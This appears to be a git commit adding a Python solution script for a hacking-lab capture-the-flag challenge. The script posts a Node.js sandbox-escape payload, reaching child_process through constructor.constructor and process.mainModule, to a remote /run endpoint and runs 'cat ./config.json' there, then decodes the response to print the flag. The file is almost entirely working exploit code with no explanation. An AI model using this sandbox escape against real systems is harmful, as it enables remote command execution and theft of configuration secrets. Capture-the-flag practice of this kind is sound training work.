Day 10 + 11

2018-12-11 14:15:19 +01:00
parent 89d6321015
commit 4e0b54b29a
2 changed files with 69 additions and 0 deletions
--- a/10/decode.py
+++ b/10/decode.py
@@ -0,0 +1,27 @@
+#!/usr/bin/python
+
+import urllib.request
+import urllib.parse
+import json
+
+class Payload(object):
+    def __init__(self, j):
+        self.__dict__ = json.loads(j)
+    def get(self, key):
+        return self.__dict__[key]
+
+code = 'new Function("return (this.constructor.constructor(\'return (this.process.mainModule.constructor._load)\')())")()("child_process").execSync("cat ./config.json")'
+url = "http://whale.hacking-lab.com:3000/run"
+data = urllib.parse.urlencode({"run": code}).encode()
+request = urllib.request.Request(url, data=data)
+response = urllib.request.urlopen(request).read()
+
+p = Payload(response)
+result = p.get("result")
+
+indexStart = result.find("[") + 1
+indexEnd = result.find("]")
+result = ''.join([chr(int(x.strip())) for x in result[indexStart:indexEnd].split(",")])
+
+p = Payload(result)
+print(p.get("flag"))